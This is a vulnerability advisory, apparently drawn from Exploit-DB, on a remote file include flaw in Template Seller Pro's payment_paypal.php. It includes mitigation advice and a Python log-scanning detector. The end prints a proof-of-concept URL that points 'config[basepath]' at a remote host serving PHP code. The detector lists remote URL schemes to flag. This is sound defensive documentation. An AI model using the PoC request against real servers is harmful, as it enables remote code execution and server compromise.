Vendor: Template Seller Pro
By:
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Include
CWE: 98
Product Name: Template Seller Pro
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote File Include Vulnerability in Template Seller Pro

The Template Seller Pro application is prone to a remote file include vulnerability. This vulnerability occurs due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this vulnerability by injecting a malicious URL in the 'config[basepath]' parameter of the 'payment_paypal.php' script. By including a remote file containing arbitrary PHP code, an attacker can execute arbitrary commands on the affected server with the privileges of the web server process. This could lead to unauthorized access and compromise of the system.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Template Seller Pro application to a version that properly sanitizes user input. Additionally, web application firewalls and input validation mechanisms can be implemented to filter out malicious input.
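As a detection aid added here (not part of the advisory or the vendor's code), the Python script below scans access-log lines in the Apache/nginx combined format for query parameters whose value is a remote URL, the request shape of the PoC in the Exploit-DB data, and rates a hit on config[basepath] above ordinary URL-valued parameters. The log format and the sample lines are assumptions constructed for the example.

```python
"""Flag access-log requests whose query parameters carry a remote URL, the request
shape used against 'config[basepath]' in payment_paypal.php."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" prefix: client, ident, user, [timestamp], "request line", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Stream wrappers PHP's include() will follow when allow_url_include is enabled.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:")

# Parameters known to reach include(); a remote scheme here is the advisory's pattern, not a maybe.
WATCH_PARAMS = {"config[basepath]"}

def remote_params(target):
    """Return [(name, value)] for query parameters whose decoded value starts with a remote scheme.
    parse_qsl decodes once; the extra unquote() also catches double-encoded values."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value).strip()
        if decoded.lower().startswith(REMOTE_SCHEMES):
            hits.append((name, decoded))
    return hits

def scan(lines):
    """Return one finding per request line with a remote URL in a parameter. Severity is 'high'
    for a watched parameter, 'review' otherwise (return_url-style parameters are normal in payment flows)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at fields
        hits = remote_params(m.group("target"))
        if not hits:
            continue
        severity = "high" if any(n in WATCH_PARAMS for n, _ in hits) else "review"
        findings.append({"ip": m.group("ip"), "path": urlsplit(m.group("target")).path,
                         "params": hits, "status": int(m.group("status")), "severity": severity})
    return findings

# Constructed sample lines (not real traffic): a normal request, a legitimate URL-valued
# parameter, and the advisory's PoC shape with the parameter name percent-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Nov/2005:10:01:02 +0000] "GET /include/paymentplugins/payment_paypal.php?order=42 HTTP/1.1" 200 512',
    '203.0.113.6 - - [17/Nov/2005:10:01:09 +0000] "GET /checkout.php?return_url=https://shop.example.com/thanks HTTP/1.1" 302 0',
    '198.51.100.9 - - [17/Nov/2005:10:02:30 +0000] "GET /include/paymentplugins/payment_paypal.php?config%5Bbasepath%5D=http%3A%2F%2Fwww.example.com%2F%5BCODE%5D%3F HTTP/1.1" 200 88',
]
```

Run `scan(SAMPLE_LOG)` to get two findings: the checkout redirect as `review` and the payment_paypal.php request as `high`.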
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15441/info

Template Seller Pro is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/include/paymentplugins/payment_paypal.php?config[basepath]=http://www.example.com/[CODE]?